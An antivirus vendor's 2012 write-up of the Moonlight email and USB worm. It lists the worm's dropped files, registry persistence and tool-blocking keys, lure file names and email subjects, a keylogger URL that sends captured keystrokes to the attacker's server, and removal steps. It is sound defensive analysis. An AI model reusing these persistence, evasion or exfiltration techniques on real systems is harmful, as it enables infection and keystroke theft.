Worm.Win32.Moonlight.gen

by alexander.adamov on May 14th, 2012 in Malware Descriptions.

Platform: Win32
Type: Worm
Size: 32768 bytes
Packer: PE_Patch, PECompact, PecBundle
Unpacked size: 123 KB
Language: Visual Basic
MD5: 5C58E370266F182E6507D2AEF55228E6
SHA1: E43C9BEFF365596525CD28DEBBC572761E4E71D5

Summary

The worm creates copies of itself on the local drives and shared network resources. It also can spread via email.

Technical Details

Installation

Once launched, the worm creates its copies on the system drive:

%USERPROFILE%\Templates\<folder_name_2>\service.exe
%USERPROFILE%\Templates\<folder_name_2>\winlogon.exe
%WinDir%\<folder_name_1>\EmangEloh.exe
%WinDir%\<folder_name_1>\smss.exe
%System%\<folder_name_3>\Z<rnd_1>cie.cmd
%WinDir%\sa-<rnd_2>.exe
%WinDir%\Ti<rnd_3>ta.exe
%WinDir%\<folder_name_1>\Ja<rnd_4>bLay.com
%System%\<rnd_1><rnd_3>l.exe
%USERPROFILE%\Templates\<folder_name_2>\Tux<folder_name_2>.exe

<folder_name_1>,  <folder_name_2>,  <folder_name_3> are random names (e.g.: "M25727", "O63636Z", "X51334go"); <rnd_1>, <rnd_2>, <rnd_3>, <rnd_4> are random decimal numbers (e.g.: 127387, 755277, 545063, 10242).

To ensure the malware automatically runs each time Windows is booted, the following registry keys are added:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd>" = "%System%\<rnd_1><rnd_3>l.exe" 

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd>"  = "%WinDir%\sa-<rnd_2>.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
"Common Startup" = "C:\WINDOWS\system32\<folder_name_3>" 

[HKLM\System\CurrentControlSet\Control\SafeBoot]
"AlternateShell" = "<rnd_1><rnd_3>l.exe" 

[HKLM\System\ControlSet002\Control\SafeBoot]
"AlternateShell" = "<rnd_1><rnd_3>l.exe"

In addition, these registry key values are modified:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"    = "explorer.exe, "%USERPROFILE%\Templates\<folder_name_2>\Tux<folder_name_2>.exe""
"Userinit" = "%System%\userinit.exe , "%WinDir%\<folder_name_1>\Ja<rnd_4>bLay.com""

The worm’s copies are automatically run by the "winlogon.exe" process, even if Windows boots up in safe mode.

The worm then launches the copies with the following names:

service.exe
smss.exe
winlogon.exe
EmangEloh.exe

Payload

Once launched, the worm performs the following actions:

  • Removes registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Tok-Cirrhatus"
"AllMyBallance"
"MomentEverComes"
"Tok-Cirrhatus-1101"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"TryingToSpeak"
"YourUnintended"
"YourUnintendes"
"lexplorer"
"dkernel"
"Bron-Spizaetus-cgglmmrv"
"Bron-Spizaetus"
"Bron-Spizaetus-cfirltrx"
"ADie suka kamu"
"SaTRio ADie X"

This blocks the autorun feature for the listed programs.

  • Stores its configuration data in the system registry keys:

[HKLM\Software\Microsoft\TUX\Path]
"1" = "<folder_name_1>"
"2" = "<folder_name_2>"
"3" = "<folder_name_2>"

<folder_name_1>,  <folder_name_2>,  <folder_name_3> are random names of folders where the malware stores its copies (e.g.: "M25727", "O63636Z", "X51334go").

[HKLM\Software\Microsoft\TUX\biang]
"1" = "<rnd_1>"
"2" = "<rnd_2>"
"3" = "<rnd_3>"
"4" = "<rnd_4>"
"5" = "<rnd_5>"

<rnd_1>, <rnd_2>, <rnd_3>, <rnd_4>, <rnd_5> are random decimal numbers the malware uses to give names to its copies (e.g.: 127387, 755277, 545063, 856821, 10242).

The following are also added to the registry:

[HKCU\Software\VB and VBA Program Settings\untukmu\version]

[HKCU\Software\VB and VBA Program Settings\noGods\appActive]

  • Modifies the registry key values:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState]
"FullPath" = "1"

As a result, the full path is displayed in the Windows Explorer.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"

The registry editor is blocked.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt" = "1"

Extensions for the registered file types are hidden.

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "0"
"ShowSuperHidden" = "0"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]
"UncheckedValue" = "0"

Hidden and system attributes of all files are not displayed in the Windows Explorer.

[HKCR\scrfile]
"(Default)" = "File Folder"

Thus, the malware ensures launching its copies with the ".scr" extension.

[HKLM\System\CurrentControlSet\Services\SharedAccess]
"Start"    = "0"

The autorun feature of the system firewall is disabled.

  • Blocks launching the system utility "msconfig.exe" as well as the registry editor "regedit.exe" by adding the following registry keys:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
"debugger" = "%WinDir%\notepad.exe"

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"debugger" = "%WinDir%\notepad.exe"

  • Hides its process by using an undocumented function "RegisterServiceProcess" if the operating system of the infected computer is Windows 9x.
  • Creates the following file to identify its presence in the system:

%WinDir%\[TheMoonlight].txt (109 bytes)

The file contains the following strings:

:: The NewMoonLight ::

Created by HeLLsPAwn A.K.A B4bb1cool

(c) 2006 Depok ~ Indonesia

  • Keeps track of user’s keyboard events by sending collected data as an HTTP request to the intruder server:

http://www.apasajalah.host.sk/testms.php?mod=save&bkd=0&klog=<collected data>

  • Uploads an updated version of its executable file from the intruder server using the following URL:

http://www.geocities.com/m00nL19ht2006/

Propagation

The worm copies its body to all available portable storage devices connected to the infected computer. In the root directory of the infected disk, a copy with the following name is created:

<current user name> Porn.exe
Data < current user name>.exe
Foto < current user name>.exe
New Folder(2).exe
New Folder.scr

In addition, the worm recursively searches through all the directories on the infected drive. It creates its copy with the following name in each found directory:

<name><61 space>.scr

where <name> — name of the sub-catalog.

The worm also spread via shared network resources and peer to peer (p2p) file sharing channels. The worm creates its copies in all folders found on the infected computer which contain the following sub-strings in their names:

download
upload
share

Names of the copies are picked up from the following list:

TutoriaL HAcking<61 space>.exe
Lagu – Server<61 space>.scr
Data DosenKu<61 space>.exe
Titip Folder Jangan DiHapus<61 space>.exe
Love Song<61 space>.scr
New mp3 BaraT !! <61 space>.exe
THe Best Ungu<61 space>.scr
Blink 182<61 space>.exe
Norman virus Control 5.18<61 space>.exe
Windows Vista setup<61 space>.scr
Gallery<61 space>.scr
RaHasIA<61 space>.exe

The worm can also spread via email. It searches for for email addresses  within files with the following extensions:

txt
html
asp
wab
eml
doc
php
htm
rtf

Addresses which names contain the following sub-strings are not used:

norman
norton
panda
mcafee
Syman
sophos
Trend
vaksin
novell
virus

Collected addresses are also used to get names of SMTP servers. Domain names are added to the following sub-strings:

smtp.
mail.
ns1.
mx1.
mail1.
mx.
mxs.
relay.
gate.

When configuring the send process, the malware searches on the infected computer for information held by the following email service providers:

Friendster
Yahoo!
Gmail
Hotmail

The registry key value is also analyzed:

[HKLM\Software\Microsoft\Internet Account Manager\Accounts]
"SMTP Email Address"

The malware selects a name for the “From” field of the email being sent from the following list:

HackersMinds
JuwitaNingrum
Shit
BInaSarana
SaZZA
admin
Fria
Lia
HellSpawn
Emily
Anata
Titta
Davis
sasUK3
Rita
MooNLight
Jagung-Bakar
BabbyBear
CoolMan
12050075
Yoseph2000
mansonisme
jojo
SpawN
B4bb1cool

The email subject can be one from the following list:

Tolong Aku..
Tolong
hi please see this file
hey Indonesian porn Tiara lestari pic's
free screen saver romance for you
Please Visit Our Web Site moonLight.com>moonLight.com
please read again what i have written to you
thank's for you register your acount details are attached
Registration Confirmation
Cek This
hello
RE:bla bla bla
RE:HeLLO GuYs

The attached file contains a copy of the worm. The attachment name can be one of the following:

curriculum vittae.zip
USE_RAR_To_Extract.ace
ZIPPED.zip
FILEATTACH.bz2
Doc.gz
file.bz2
thisfile.gz
TITTA'S Picture.jar

Removal Recommendations

  1. Run a full scan of your computer using the Antivirus program with the updated definition database (Download Ad-Aware Free).
  2. Do not launch the EXE files and do not reboot your computer until a full scan is complete.
  3. Delete the registry keys (How to Work with System Registry):
  4. [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "<rnd>" = "%System%\<rnd_1><rnd_3>l.exe" 

    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "<rnd>" = "%WinDir%\sa-<rnd_2>.exe" 

    [HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders]
    "Common Startup" = "C:\WINDOWS\system32\<folder_name_3>" 

    [HKLM\System\CurrentControlSet\Control\SafeBoot]
    "AlternateShell" = "<rnd_1><rnd_3>l.exe" 

    [HKLM\System\ControlSet002\Control\SafeBoot]
    "AlternateShell" = "<rnd_1><rnd_3>l.exe" 

    [HKLM\Software\Microsoft\TUX\Path]
    "1" = "<folder_name_1>"
    "2" = "<folder_name_2>"
    "3" = "<folder_name_2>" 

    [HKLM\Software\Microsoft\TUX\biang]
    "1" = "<rnd_1>"
    "2" = "<rnd_2>"
    "3" = "<rnd_3>"
    "4" = "<rnd_4>"
    "5" = "<rnd_5>" 

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]
    "debugger" = "%WinDir%\notepad.exe" 

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
    "debugger" = "%WinDir%\notepad.exe" 

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]

     "DisableRegistryTools" = "1"

  5. Delete the registry branches (How to Work with System Registry):
  6. [HKCU\Software\VB and VBA Program Settings\untukmu\version]

    [HKCU\Software\VB and VBA Program Settings\noGods\appActive]

  7. Restore the registry key value (How to Work with System Registry):
  8. [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell"= "explorer.exe"
     "Userinit" = "userinit.exe" 

    [HKLM\System\CurrentControlSet\Services\SharedAccess]
    "Start" = "4"

  9. Delete a file:
  10. %WinDir%\[TheMoonlight].txt

  11. Clean the Temporary Internet Files folder, which contains infected files (How to clean Temporary Internet Files folder).